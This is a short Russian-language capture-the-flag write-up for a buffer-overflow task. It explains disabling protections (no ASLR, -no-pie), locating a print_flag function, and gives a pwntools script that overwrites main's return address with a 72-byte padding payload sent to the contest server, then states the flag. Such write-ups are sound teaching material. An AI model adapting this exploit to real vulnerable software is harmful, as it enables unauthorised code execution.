# ОООверфлоу: Write-up

Поэксперементировав с данным исполняемым файлом, нужно было понять, что он не защищён от переполнения, однако просто переполнение кроме Segmentation fault'а ничего нам не даёт. 

Тогда, сдизассемблив файл, можно было найти интересную функцию под названием `print_flag`, а также её адрес — `0x401196`.

В этом таске был отключён ASLR, а бинарный файл компилился с флагом `-no-pie`, поэтому адреса функций не менялись с каждым запуском файла.

Теперь нам необходимо с помощью переполнения перезаписать адрес возврата из функции `main`, хранящийся на стеке, адресом функции `print_flag`, подобрав необходимый оффсет «мусорных» данных в переполнении или посмотрев размер данных функции на стеке в декомпиляторе.

В итоге флаг получался следующим скриптом:

```python
from pwn import remote, p64

r = remote('ugractf.ru', 5002)
r.recvuntil(b'name?\n')
r.sendline('a' * 72 + p64(0x401196))
r.sendline('')
print(r.recvall())
```

Флаг: **ugra_pointer_tourist**
